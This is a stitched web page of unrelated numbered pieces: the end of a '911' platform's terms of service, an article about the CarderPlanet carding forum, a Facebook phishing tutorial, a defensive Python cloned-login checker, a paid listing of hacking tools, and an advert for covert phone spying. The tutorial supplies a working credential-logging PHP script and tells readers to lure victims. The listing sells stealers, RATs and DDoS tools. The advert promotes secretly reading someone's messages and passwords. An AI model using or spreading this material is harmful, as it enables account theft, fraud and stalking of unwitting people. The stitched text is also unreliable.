23. Severability
In the event that a provision of this Agreement is found to be unlawful, conflicting with another provision of the Agreement, or otherwise unenforceable, the Agreement will remain in force as though it had been entered into without that unenforceable provision being included in it.
If two or more provisions of this Agreement or any other agreement you may have with 911 are deemed to conflict with each other’s operation, 911 shall have the sole right to elect which provision remains in force.

24. Non-Waiver
We reserve all rights permitted to us under this Agreement as well as under the provisions of any applicable law. Our non-enforcement of any particular provision or provisions of this Agreement or any applicable law should not be construed as our waiver of the right to enforce that same provision under the same or different circumstances at any time in the future.

25. Assignment and Survival
You may not assign your rights and/or obligations under this Agreement to any other party without our prior written consent. We may assign our rights and/or obligations under this Agreement to any other party at our discretion. All portions of this Agreement that would reasonably be believed to survive termination shall survive and remain in full force upon termination, including but not limited to the Limitation of Liabilities, Representation and Warranties, Licensing, Indemnification, and Arbitration sections.

26. Termination
You may cancel your Paid Subscription or your account at any time via your 911 dashboard or contacting us at sp[@]911 dot re. Any refunds are subject to the refund terms contained in this Agreement. Please be aware that upon termination of your account, access to portions of our Platform may become immediately disabled. We may terminate this Agreement with you if we determine that: (1) you have violated any applicable laws while using our Platform; (2) if you have violated this Agreement or as permitted by the Platform; or (3) if we believe that any of your actions may legally harm 911 or our business interests, at our sole decision or discretion. In the event of termination, we will strive to provide you with a timely explanation; however, we are not required to do so.

27. Entire Agreement
This Agreement along with the EULA AND Privacy Policy constitute the complete and exclusive understanding and agreement between the parties regarding the subject matter herein and supersede all prior or contemporaneous agreements or understandings written or oral, relating to its subject matter. Any waiver, modification or amendment of any provision of this Agreement will be effective only if in writing and signed by a duly authorized representative of each party.

28. Amendments
We may amend this Agreement from time to time.
When we amend this Agreement, we will update this page and indicate the date that it was last modified or we may email you. You may refuse to agree to the amendments, but if you do, you must immediately cease using our Platform and our Platform.

29. Electronic Communications
The communications between you and 911 use electronic means, whether you visit the Platform or send 911 e-mails, or whether 911 posts notices on the Platform or communications with you via mobile notifications or e-mail. For contractual purposes, you (1) consent to receive communications from 911 in an electronic form; and (2) agree that all terms, conditions, agreements, notices, disclosures, and other communications that 911 provides to you electronically satisfy any legal requirement that such communications would satisfy if it were to be in writing. The foregoing does not affect your statutory rights.

30. Relationship of the Parties.
The parties are independent contractors. This Agreement does not create a partnership, franchise, joint venture, agency, fiduciary or employment relationship between you and 911.

31. Anti-Abuse
You agree to abide by our anti-abuse policies as listed at: https://911.re/anti
If you become aware that any user is abusing our services please contact us at abusereport@911.re

32. Third-Party Content
We do not control, and we are not responsible for, any data, content, services, or products (including software) that you access, download, receive or buy while using the Platform. We may, but do not have any obligation to, block information, transmissions or access to certain information, services, products or domains to protect the Platform, our network, the public or our users.
We are not a publisher of third-party content accessed through the Platform and are not responsible for the content, accuracy, timeliness or delivery of any opinions, advice, statements, messages, services, graphics, data or any other information provided to or by third parties as accessible through the Platform.

33. Geographical Access
The Platform are not geographically limited; however, we make no representations or warranties that the Platform are appropriate for use or access in your location and jurisdiction. You access and use the Platform in your country on your own initiative and you solely are responsible for complying with your local laws and regulations, if and to the extent such laws are applicable. We reserve the right to limit, in our sole discretion, the availability of the Platform or any portion thereof, to any person, entity, geographic area, or jurisdiction, at any time.

34. Platform Issues and Support
Where you have any questions, issues, or if you are having trouble accessing or using the Platform, please contact us at sp@911.re.
  9. US intelligence agencies often catch "Russian" hackers and carders.

A young man was slowly sipping a cocktail at Nice airport, leaving after a rough rest, when a special forces squad burst into the waiting room.

In the hacker world, Khorokhorin is better known under the pseudonym BadB.

American government agencies called CarderPlanet perhaps the most dangerous community of cybercriminals.

"I broke the Israeli army"

How does the carder business work? You can steal bank card information in completely different ways: copy it in a restaurant when paying an invoice, convince the user to enter data on a fake website, hack into the database of a bank or large retailer, or install a reader at an ATM. Such databases can be resold, and not necessarily resold by hackers themselves. Sometimes sales channels are searched for by intermediaries. This is partly why hacker forums are needed, where you can find potential buyers.

One of these intermediaries, Dmitry Golubov, was met in 1998 by Vladislav Khorokhorin, who needed real bank card details to access a porn site. "In practice, Dima could not hack anything more serious than his parents' dresser. He couldn't even install Windows properly. His real talent was organizing people, haggling and bartering," says Khorokhorin about Golubov.

Prior to this incident, Khorokhorin was almost not engaged in carding: he stole ICQ numbers, hacked Internet service providers, and even managed to serve time in an Israeli prison, where he moved with his mother from Donetsk. "I broke the Israeli army. After serving time and being kicked out of the service with a bang, I then broke the Israeli Bank Discount," says Khorokhorin. Then he was about 20 years old. Carding has become a new passion for Khorokhorin. He was increasingly sitting on the forum Carder.org where he also invited Golubov.

As Khorokhorin recalls, Golubov immediately decided to make money and placed an ad for the sale of credit cards, or "cardboard", as they were called in the crowd. However, almost immediately he was kicked out for such an ad. "It was allowed to place an ad for sale if you yourself directly stole the goods being sold," explains Khorokhorin. According to him, Golubov immediately decided to open his own forum Carder.ru which would be an alternative to Carder.org. For the position of administrator and web designer, he called his new friend Khorokhorin-BadB. The forum became popular almost immediately.

However, the new forum did not last long: the site received many complaints, and it was closed. But its creators immediately registered three new domains: Carderplanet.com, Carderplanet.net and Carderplanet.org. So, in 2001, the history of the forum began, which the US intelligence agencies would later call "the most dangerous cybercrime organization."

From "watching" to "Dony"

The new site was rapidly gaining popularity: there you could chat with like-minded people, read training articles, ask for advice, negotiate a deal or get an order. The forum was run by administrators, the most important of whom called themselves dons in the spirit of the Sicilian mafia, and all together they were "family". However, initially the creators of the forum were closer to the Russian criminal romance: they called themselves virtual "thieves in law" and "watchers", but this was quickly abandoned. "We are also not far from the criminal world of the CIS.

The Carderplanet forum gradually began to attract not only carders, but also representatives of other cybercrime spheres. And sometimes even people who are far from hacking at all. So, one of the dons on the forum was Roman VEGA: he had his own project Boa Factory, which not only sold credit cards, but could also make passports of other countries by order.

"The procedure with the registration of European and American passports was simple: the customer sent photos via "soap" to .jpg, their requirements for the passport of a particular country and their (desired) data, and after some time (usually several weeks) received by mail, to the address specified when ordering, the finished passport. If desired - with a handful of stamps of entry and exit from different countries - so that the passport does not look new," says the source of Forbes, familiar with VEGA.

VEGA found out about the carder forum almost by accident: a partner told him about CarderPlanet, to whom VEGA complained about frequent hacker attacks on the systems of his companies. VEGA quickly got used to the new environment, and in mid-2002, he became almost the main character at the forum participants' meeting, which the creators of CarderPlanet decided to hold in Odessa. Why do hackers need a conference? At that time, professional conferences of cybersecurity specialists were being held in the United States, and carders wanted to make an analog.

[Image: Vladislav Khorokhorin]

"Top managers" of the forum tried to control transactions and life on the forum. According to Khorokhorin, everyone had to obey "universal" moral values: "don't piss", "don't rat", "respect the hierarchy", "don't shit where you live". Although it was not possible to completely avoid conflicts. "Showdowns were constant, like any other business, especially criminal, here the struggle for spheres of influence is inevitable. And people were often caught. No one, of course, died, not animals, but sometimes they were hit hard," says Khorokhorin.

VEGA's cooperation with CarderPlanet ended quickly enough, and in February 2003, he was arrested in Nicosia. As VEGA himself told Forbes, local police and Interpol officers detained him in a music store while he was choosing a CD. At the same time, the Castelli hotel, where VEGA lived, was raided: there the police found another hacker, Liratto, and three laptops. "These computers were also attributed to me. Liratto spent 9 months in Cyprus and went to Ukraine. I have nothing to do with it. He's a good person," VEGA sums up.
  10. How To Make A Phishing Page Of Any Websites | Full Tutorial I sell scampage and letters already made telegram @krrrbaw Hi readers ,From now onward we’ll learn serious hacking and today I’m going to discuss about a well known hacking method that’s called phishing.Most of internet users aware of that but I told you guys this site is for newbies and that’s why I’m trying to teach you guys from the beginning .In this tutorial you guys will come to know details about phishing , how it works , how to make a phishing page and total 34 phishing page completely free !Well, let’s get startedWhat is phishing?Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to fool users,and exploits the poor usability of current web security technologies. In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.How to make any kind of phishing page ?Many of you may use software to make a phishing page but today I’ll show you guys something behind software and how you can make a phishing page by yourself .Well, to make any complete phishing package we need to make the following things : Phishing pagePHP scriptLog in file Make A Phishing Page : Step 1: Go to the website that you want to make a phishing page .Hence I’ll show you how to make a phishing page of facebook So, go to the official website of facebook www.facebook.com . Step 2: Now, click on the right button of your mouse and click view page source . You’ll be able to see a page like the picture below . Step 3: Copy the whole page and paste it into Notepad . 
(To open the Notepad go to Start >All programs >Accessories >Notepad ) Step 4: Now Press ” Ctrl+F ” and and click Find Next to search for “action” word .You’ll find total 3 “action” but choose the one that is after the “login_form” word.See the picture below to understand it properly.Thats the orignal source code of facebook login page and when we login our action is sent to the url written next to the highlighted portion. Step 5 : Now replace the Url after action word (https://www.facebook.com/login.php?login_attempt=1) with your exploit. I have given this exploit with the name of funsofts.php in the download package.[On my next post I'll provide download package] So, it will become as below : Step 6 : Now save as1.Give the File name - index.html2.Select Save as type - All Files3. Select Encoding - Unicode4.Click Save button to save the file.See the picture below to get it properly.You already made a fake log in (phishing page) page Now, you have to make a PHP scrips .Follow step by step and you’ll be done Make A PHP Scripts : Step 1: Open your Notepad Step 2: Copy and paste the code given below .<?phpheader (‘Location: http://www.facebook.com/’);$handle = fopen(“log.txt”, “a”);foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>Note : At the second line of code you see header (‘Location:http://www.facebook.com/’) .Here, we are making a facebook phishing page that’s why I provide the official URL of facebook but if you wanna make phishing page for some other page then you should give the official URL of that website.Ex : If you want to make a phishing page of yahoo mail then it would be like thisheader (‘Location:https://login.yahoo.com/’)Hope, I made you clear Step 3 :Now Save as 1.Give the File name - funsofts.php2.Select Save as type - All Files3. 
Select Encoding - Unicode4.Click Save button to save the file.Make A Text File :1.Just right click on your mouse and go to New>Text document .You will see a new text file will be appear .Give it a name like log .Well done You successfully made the phishing package .Now whatever you have to do just upload the all three file [Phishing page, PHP scripts, Text (log) file ] to any website that support PHP and send the link to your victim and convince him/her to log in your fake log in page .When your victim will log in to your fake log in page you’ll get the password and email address at your log.txt file .Here are some websites name there you can upload your phishing page :1.<<www.my3gbcom>>2.<<www.box.net>>May be you know this trick before but always remember one thing .“A old trick is may be a new trick for someone who didn’t know that before ”That’s why it was essential to provide the whole tutorial for newbies Now you’ll be able to hack any Facebook account , Yahoo mail, Gmail , Twitter account or anything you want by phishing method.Here are 37 phishing pages for 37 websites .You can download this package if you want .May be your antivirus will detect it as a virus cause many anti-viruses detect phishing page as a virus.You may can turn off your anti-virus before download it or if you don’t trust me than I recommend you to don’t download this package .
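For defenders, a page built the way this post describes leaves a recognisable fingerprint: the copied source still references the real site's hosts, while the password form submits somewhere else. The Python check below is an added example, not part of the original post; the domains, the `collect.php` handler name and the sample HTML are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: one login template rendered twice. The brand domain,
# the hosting domain and the "collect.php" handler name are placeholders.
TEMPLATE = """<html><head><title>Log in</title>
<link rel="stylesheet" href="https://static.brand.example/css/login.css">
<meta property="og:url" content="https://www.brand.example/login">
</head><body>
<form id="login_form" action="{action}" method="post">
  <input type="text" name="email"><input type="password" name="pass">
</form>
<a href="javascript:void(0)">Help</a>
</body></html>"""
BRAND = ("brand.example",)
GENUINE = ("https://www.brand.example/login", TEMPLATE.format(action="/session"))
CLONE = ("http://hosting.example.net/promo/index.html",
         TEMPLATE.format(action="collect.php"))


def resolve(url, base):
    """Parse url relative to base; None if it cannot be parsed."""
    try:
        return urlparse(urljoin(base, url))
    except ValueError:
        return None


def host_in(host, domains):
    """True if host is one of the domains or a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


class PageScan(HTMLParser):
    """Collects each form (action, has password field) and every referenced URL."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []     # one dict per <form>
        self.refs = []      # href / src / og:url values
        self._open = None   # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if a.get("type", "").lower() == "password":
                self._open["password"] = True
        for key in ("href", "src"):
            if a.get(key):
                self.refs.append(a[key])
        if tag == "meta" and a.get("property", "").lower() == "og:url":
            self.refs.append(a.get("content", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_login_page(html, served_from, brand_domains):
    """Return a list of (code, detail) findings for one fetched page."""
    scan = PageScan()
    scan.feed(html)
    scan.close()
    parsed = [resolve(r, served_from) for r in scan.refs]
    brand_refs = sorted({p.hostname for p in parsed
                         if p and host_in(p.hostname, brand_domains)})
    findings = []
    # Page leans on the brand's hosts but is not served by the brand.
    if brand_refs and not host_in(urlparse(served_from).hostname, brand_domains):
        findings.append(("BRAND_ASSETS_OFF_ORIGIN", ", ".join(brand_refs)))
    for form in scan.forms:
        if not form["password"]:
            continue
        target = resolve(form["action"], served_from)
        if target is None:
            continue
        # Credentials leave for a host the brand does not own.
        if brand_refs and not host_in(target.hostname, brand_domains):
            findings.append(("PASSWORD_FORM_OFF_BRAND", target.geturl()))
        if target.scheme != "https":
            findings.append(("PASSWORD_FORM_NOT_HTTPS", target.geturl()))
    return findings


if __name__ == "__main__":
    for url, html in (GENUINE, CLONE):
        print(url, audit_login_page(html, url, BRAND))
```

Brand and abuse teams can run a check like this over URLs surfaced by referrer logs or user reports; `PASSWORD_FORM_OFF_BRAND` is the finding that corresponds to the rewritten form action.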
  12. Ultimate Hacking Tools Pack (400+ Tools) I sell my hacking pack with over 400 hacking software -I have checked and all software is up to date and still working -interested sent a private message or contacted on the @krrrbaw telegram here is a list of all the software in the pack Includes: Binders (23): amokjoiner Bl0b B!nder 0.2.0 + USG blackhole Binder F.B.I. Binder Predator 1.6 PureBiND3R by d3will Schniedelwutz Binder 1.0 Simple Binder by Stonedinfect sp1r1tus Binder 1.0 Tool-Store Binder 1.0 Tool-Store Toasty Binder 1.0 Yet Another Binder 2.0 Albertino_Binder bl0b_bind EESBinder10 Kbw-Binder Public_27.12 Rapid_Binder_v_1.0 Sadaf_Binder SaLiXeM_File_Binder Sh!T_Multi_Binder_Free- vBinder yab201 --------------------------------------------------------------------- Cracking Tools (16): Access Driver Ares Attack Toolkit v4.1 & source code included Brutus Golden eye 2005 HellLabs Proxy Checker v7.4.18 HostScan v1.6.5.531 Invisible Browsing v4.0 IPScanner v1.86 Net Tools Suite Pack Abril NFO-Tools All In One Patchs All In One 2005 Sentry20 SoftIce 4.05 -Win 2000-XP VNC Crack WWWHack --------------------------------------------------------------------- Crypters (24): Bifrost Crypter by ArexX 2 Cryptable Seduction 1.0 by DizzY Crypter by Permabatt Crypter bY YoDa Cryptic 1.5 Daemon Crypt 2 Public Deception 4 by [RaGe] Destructor Crypter EXECrypt 1 M0d by CARDX Fuzz Buzz 1.2 by BulletProof OSC-Crypter by haZl0oh M0d Poison Ivy Crypt M0d by CARDX SaW V1 Mod by LEGIONPR Skorpien007 Crypter 3.1 Stonedinfect Crypter 1.0 Trojka Crypter 1.1 by tr1p0d Builder Carb0n_Crypter_1.8 Sick Crypter Sikandar's_Crypter_Version_1.0_Public Simple+Crypter Test1 Triloko_Crypter XxVtecman9xX_Crypter --------------------------------------------------------------------- DDosers (53): assault_1.0 click_2.2 crazyping_1.1 death_n_destruction donut_http_flooder_1.4 fed_up_2.0 firewall_killer_1.3 igmp_nuke_1.0 illusion DOS krate_port_bomber meliksah_nuke_2.5 nemesy_1.3 NetBot_Attacker 1.4 
English panther_2.0 spoofed_irc_nuker_1.3 ~FuCk_It!~_DOS ass4ult b4ttl3p0ng bd0rk's DoS Killer BFF_DoS_(Ping)_v1.0 BioHazard clik2 CS_DoS DDOS denden_ddos DoS 5.5 Fina Cold_Assassin69l Dos Attacker Alpha 1.1 doshttp_setup fortune FUBAR Hartz4Flooder_v0.2. IFRAME_DDoS_v1.0 iGirls_DoS_Tool IP Port Ddos IRAN DoS Longcat_TCP_HTTP_UDP_Flooder_v2.3_Final MegaDeath PM2 Private_ddos_tool_by_pureedee_v3.0 rDos RocketV1_0 rpcnuke ServerAttack Site_Hog_v1_release SMFH_DOS SuPeRdDoS_1.0 Supernova 5 SYN-flood t3c4i3_s_Dos_Tool_v2.00 Website_Crasherv4.7 XDos zDoS --------------------------------------------------------------------- Fake Programs (24): Cod_Mw2_Keygen-Idecrypt CoD-Mw2-Keygen ddoser_3.6 Dice_RiggerDoXiE__1.2 emblem_crypter FAKE_Steam_Keygen FlexBot_Runescape Flooder Gamebattles_Credit_Adder Microsoft_Point_Generator MSDN_admin MSN_Password_Cracker Multi-Hacker MW2_Serial_Generator Norton_2010_Keygen Paypal_Money_hack PayPal_Money_Hacker Poker_Hack Rapidshare Extender Runescape_Stat_Changer teamviewer_patch Windows_7_Serial_Generater Windows_Activator WoW_account_hacker XBox_360_Account_Hacker --------------------------------------------------------------------- Host Boosters (8): BioZombie dbot DDoSeR_3.4 Host_Booter Metus_GB_Edition MeTuS-Delphi-2.8 X-R z3r0xb0t_Final_Public_Release_[v2.0] --------------------------------------------------------------------- Phishing Pages (56): eBay.com Fake Login Page(Tut) Gmail.de Playstation Underground RapidShare.com RapidShare.de Abbey ( CC ) Phisher Abbey Phisher AceMailer-v1 Adult Friend Finder Phisher AIM Phisher Amazon Phisher AnonymousMailer astatalk Phisher Chase Phisher DeviantArt Phisher Dynamic_RapidShare_Phisher_v0.8 E-Trade Phisher facebook Phisher FileFront Phisher FreeWebs Phisher Friendster Phisher Gaia Gold generator Fake login Gmail Phisher GoDaddy Phisher Habbo Phisher Hi 5 Phisher hotmail Phisher HP ( Shop ) Phisher IMVU Phisher IP Hider Jiffy Gmail Account Creator MySpace Phisher [9:29:43 PM]Krrr baw: 
Nationwide Phisher PayPal Phisher Phisher Maker! Phishing Letters Photobucker Phiser PornoTube Phisher RapidExtract Regions Phisher Ripway Phisher RuneScape Phisher SendSpace Phisher Skype Phisher SourceForge Phisher Steam Phiser Tagged Phisher Tarantula thisis50 Phisher Warez-bb Phisher Wells Fargo Phisher WoW Phisher WWE Phisher XboxLive Phisher YouTube Phisher --------------------------------------------------------------------- Remote Administration Tools: (86) bn135 SubSeven 2.2 [BUGFIX]Schwarze Sonne RAT 0.8.1 [BUGFIX]SS-RAT 0.4 Final A32s (fifth) RAT Apocalypse144 Arabian-Attacker v1.2.2 Arabian-Attacker v1.4.0 Archelaus Beta Arctic R.A.T. 0.0.1 Alpha Beast v2.07 Bifrost12 Cerberus RAT 1.03.4 Beta Cerberus Char0n CIA_v1.3 CyberGate v1.00.1 CyberGate v1.02.0 CyberGate v1.03.0 CyberGate v1.04.8 CyberGate_v1.01.8 CyberGate-v1.00.0 Daleth RAT 1.0(ss rat src) DarkComet2RC1 DarkComet2RC5 DarkComet-RAT 2.0 Final RC2 DarkComet-RAT 2.0 Final DarkComet-RAT 2.0 LAST BETA DarkComet-RAT 2.0b 2 DarkComet-RAT 2.0b3 DarkComet-RAT Beta Test 01 DarkMoon v4.11 Deeper 1.0 Beta10 - Fix1 Deeper_1.0_Beta8 Deeper_1.0_Beta9 DRAT 2009 V4.0 Build 1201 DRAT 2009 V4.2 Build 1216 Golden Phoenix Rat 0.2 GraphicBooting RAT Beta v0.3 Lost Door 4.2.2 Lost Door V2.2 Stable Public edition Lost Door v4.3.1 Lost_Door_V4.2_light MiniMo v0.7a PublicBeta MiniMo_v0.7a_PublicBeta miniRAT 0.6 Beta MofoTro NetDevil_v1.5 NovaLite_final5 NyTrojan_RAT Optix v1.33 Optix_v1.33 PaiN RAT 0.1 Beta 9 painrat0.1Beta9 PI2.3.2 Pocket RAT Poison Ivy 2.3.2 ProRat_v1.9 SE Schwarze Sonne 0.2 Final Schwarze Sonne RAT 0.1 Final Schwarze Sonne RAT 0.1 Public Beta 2 Schwarze Sonne RAT 0.1 Public Beta Schwarze Sonne RAT 0.2 Beta Schwarze Sonne RAT 0.7 Schwarze Sonne RAT 0.8 Schwarze_Sonne_0.5_Beta Seed1.1 sharK_3 SharpEye-Rat1-0_beta2 solitude_1.0_cracked_by_DizzY_D Spt-Net_[RAT]_v2.6 Spy-Net 2.7 SS-RAT 0.3 Beta SS-RAT 0.5 Final SS-RAT 0.6 Final_bugfix SS-RAT 0.6 Public Beta SubSeven_2.3 Turkojan4 Vanguard Venomous Ivy 
vibe1909_10giayFamatech.Radmin.v3.1.Remote.Control.Cracked-NoGRP VorteX RAT xHacker.3. xtremeRAT Y3kRat2k5RC10 --------------------------------------------------------------------- Scanners: (23) Advanced IP Scanner Advanced Port Scanner Bitching Threads BluePortScan LanSpy NeoTracePro NetScan Tools ProPort Putty_0.6 SuperScan [Fav] Trojan Hunter 15 ZenMap - NMap V5.21 [Win] angry_ip_scanner bitchinthreads bluesprtscn bobup DD7s_Port_Scanner HLDL-5967freeipscanner ProPort superscan4 te_port_scanner TrojanHunter15 xss_scanner --------------------------------------------------------------------- Sniffers: (2) Cain & Abel Self Installer [WinXP] WireShark Self-Installer [Win32] --------------------------------------------------------------------- SQL Injection Tools: (14) Vbulletin 3.6.5 Sql Injection GYNshell.php Havij_1.08 Hexjector v1.0.7.3SE MySQLi_Dumper_v.1.2_BIN Pangolin_Professinal_Edition_v3.0.0.1011 SPInjv1.2 Sql Hack pack -Updated sql.txt SQL_Exploiter_Pro_2.15 SQL_Injection_Tool_v2.1a SQLDEFACER V3MoHackzSQLExplt yourleetdefacepage.html --------------------------------------------------------------------- Stealers: (75) 1337 SteamACC Stealer Private Allround Stealer Armageddon Stealer 1.0 by Krusty bl0b Recovery 1.0 Blade Stealer 1.0 PUBLIC Codesoft PW Stealer 0.35 Codesoft PW Stealer 0.50 Dark Screen Stealer 2 Dimension Stealer 2 by Gumball FileZilla Stealer 1.0 PUBLIC FileZilla Stealer by Stonedinfect Firefox Password Stealer - Steamcafe Fly Stealer 0.1 Fudsonly Stealer 0.1 Hackbase Steam Phisher 1.2 BETA Hackhound Hackhound Stealer HardCore Soft ICQ Steal0r IStealer 4.0 IStealer 6.0 Legends Keyloggers LabStealer by Xash Multi Password Stealer 1.6 Papst Steale.NET Pass Stealer 3.0 Pesca Stealer 0.2 pixel Stealer 1.3.0 SC pixel Stealer 1.4.0 ProStealer Public Firefox 3 Stealer Pure-Steam 1.0 CS Pw Stealer by Killer110 PWStealer 2.0 Remote Penetration 2.2 SC LiteStealer 1 SimpleStealer 2.1 SPS Stealer SStealer by till7 Steam Stealer 1.0 by ghstoy Steam 
Stealer by till7 Stupid Stealer 6 mit PHP Logger System Stealer 2 The Simpsons Stealer 0.2 Tool-Store FileZilla Stealer 1.0 Trojan Horses Ultimate Stealer 1.0 Universal1337 - The Account Stealer Universal1337 2 Universal1337 3 Viotto Keylogger 2.0 [Release]Hackhound_Stealer 1337_SteamACC_Stealer_Private AuraStealer BKL_Public_Edition_v2.0 Builder Dark_IP_Stealer_-_by_mana5olia Dark_Screen_Stealer_V2 FF_Stealer_steamcafe iStealer_3,0 iStealer_4.0 istealer_5.0 iStealer_6.3_Legends jps18 LabStealer lps Midnight_Stealer_1.5 Multi_Password_Stealer_1.6 PassStealer_v3.0 PWstealer_v2.0 Ref_Stealer_-_99__FUD Remote_Penetration_v2.2 SimpleStealer_v1.2.4.1 Universal1337_V2 UNLIMITED_PW_STEALER_0.4 --------------------------------------------------------------------- Virus Builders: (10) DELmE's Batch Virus Generator v 2.0 DrVBS hellp2p In_Shadow_Batch_Virus_Gen_-_5.0.0_-_MOD Kill_Switch Nathans_Image_Worm Pokes-Worm-Gen-2 Power Of Batch.txt Tera_Bit vbswg2 Virus-O-Matic --------------------------------------------------------------------- Vulnerability Scanners and Exploiters: (2) Metasploit Framework V3.4.0 [Win] Nessus [Win32] Why Buy from us: - We deliver full support on all of our products, So if you have any questions please let us know. - All our guides work world wide - You will get a 100% satisfaction guarantee, so if you are not 100% satisfied with your purchase we will refund your order. - If you leave positive feedback you will get a product of your choosing for free. - Instant delivery. If you have any questions please let us know.
  13. This is what I am here for. I will tell you a simple solution which will help you in spying on anyone's messages (and so much more) within a few minutes. So without further waiting, here it goes: Reading Text Messages Secretly You can read text messages on any phone, be it Android or iOS, without the knowledge of the target user. All you need is a phone spy service for it. Such services are not rare nowadays. There are so many apps that advertise phone spying solutions with top-notch services. However, an app that lives up to its claims is hard to find. So I went through all the available apps to find the one that is the pure best in this sector. If you are using it, you don't need any other thing. This is the app I am talking about: Cocospy - The Most Innovative Thing Since Sliced Bread Cocospy is a phone monitoring tool that can give you every bit of data on the target phone. It is a web-based service and it works right from your web browser on any device. Through the Cocospy dashboard that is available on Cocospy's website, you can not only view the messages of the target phone, but even get their location, social media chats, and record their phone calls too. The #1 Text Message Interceptor While there are many other services that say they can do as much as Cocospy, none is as good as Cocospy is. This is why Cocospy is used by millions of users all over the world. With Cocospy, you can easily intercept text messages from another phone without installing the software. Here are some awesome things about Cocospy: No Root or Jailbreak: Cocospy does not require you to root or jailbreak the target device. Rooting or jailbreaking any phone makes it vulnerable to threats. Further, it also makes the other person aware that you are monitoring them. Therefore, this is a huge pro in favour of Cocospy. Web Based Service: You don't need to install any app on your phone or PC to view messages of the target user. You can do it from any web browser on any device. 
Stealth Mode: For iOS, Cocospy doesn't require you to install any app on the target phone. Therefore, the user doesn't find out they are being monitored. With Cocospy's iOS solution, you can read text messages from another phone without installing software. For Android, while you require a one-time app installation on the target phone, it always runs in stealth mode. The app size is less than 2 MB and the app icon vanishes after installation. When you have to uninstall the app, you can do it remotely through the Cocospy dashboard. It is as simple as that. So it is secure to read text messages from another phone without them knowing. Feature Loaded Cocospy has over 35 features which make sure that no activity of the user escapes from your eyes. The best part is that even if the user deletes any message, Cocospy will still reveal it to you. How to Read Someone's Text Messages Without Having Their Phone Using Cocospy to spy on someone's text messages without their phone is as easy as pie. All you need is an internet connection and you are good to go. Basically, it involves three steps: Step 1: Sign up for Cocospy and get a subscription plan. Step 2: Follow the simple on-screen setup wizard. It will guide you in configuring Cocospy. All you have to do is a few clicks here and there. Step 3: Hit 'Start' and you are ready to begin monitoring. You will be taken to your dashboard. Alternatively, you can also click here to know how to read text messages of any phone through Cocospy. This will guide you through the process in detail. Once you are on your dashboard, you can make use of various features to spy on text messages. These include: Message Monitor Get the SMSs that are received or sent by the user. These include sender/receiver info and the content of the message along with the timestamps. Any deleted messages are also present. Most importantly, you can read someone else's text messages online for free. 
Social Media Monitor Cocospy has dedicated tabs for every social media platform. You can view all the chats of the user and even the photos or videos they share. Keylogger Keylogger records all the keystrokes that are made by the user. This includes text messages, browser searches, and even usernames and passwords. Takeaways Now that you know how to read anyone's text messages without their phone, you should get started with it now. Suspicions are best ended quickly. Therefore, you need to make sure that no doubt remains in your head about the other person.